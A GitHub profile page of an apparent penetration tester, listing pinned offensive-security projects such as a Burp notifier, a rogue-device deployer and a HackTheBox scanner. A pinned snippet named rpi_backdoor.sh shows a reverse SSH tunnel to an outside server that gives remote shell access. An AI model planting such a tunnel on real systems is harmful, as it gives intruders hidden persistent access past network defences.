Skip to content
View vay3t's full-sized avatar
🏴‍☠️
The quieter you become the more you are able to hear...
🏴‍☠️
The quieter you become the more you are able to hear...
Block or Report

Block or report vay3t

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned

  1. nchgroup/Burp2Telegram nchgroup/Burp2Telegram Public

    Push notifications to Telegram bot on BurpSuite response conditions.

    Java 7 1

  2. nchgroup/intruder-deployer nchgroup/intruder-deployer Public

    Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access - Mitre

    Shell 2

  3. rpi_backdoor.sh rpi_backdoor.sh
    1
    #!/bin/bash
    2
    createTunnel() {
    3
      /usr/bin/ssh -N -R 2222:localhost:22 serverUser@25.25.25.25
    4
      if [[ $? -eq 0 ]]; then
    5
        echo Tunnel to jumpbox created successfully
  4. scan-htb scan-htb Public

    automatic scan for hackthebox

    Shell 14 1

  5. contador contador Public archive

    Contador de damiselas

    Java

  6. ghostfer ghostfer Public

    Passive hosts enumeration written in golang

    Go 1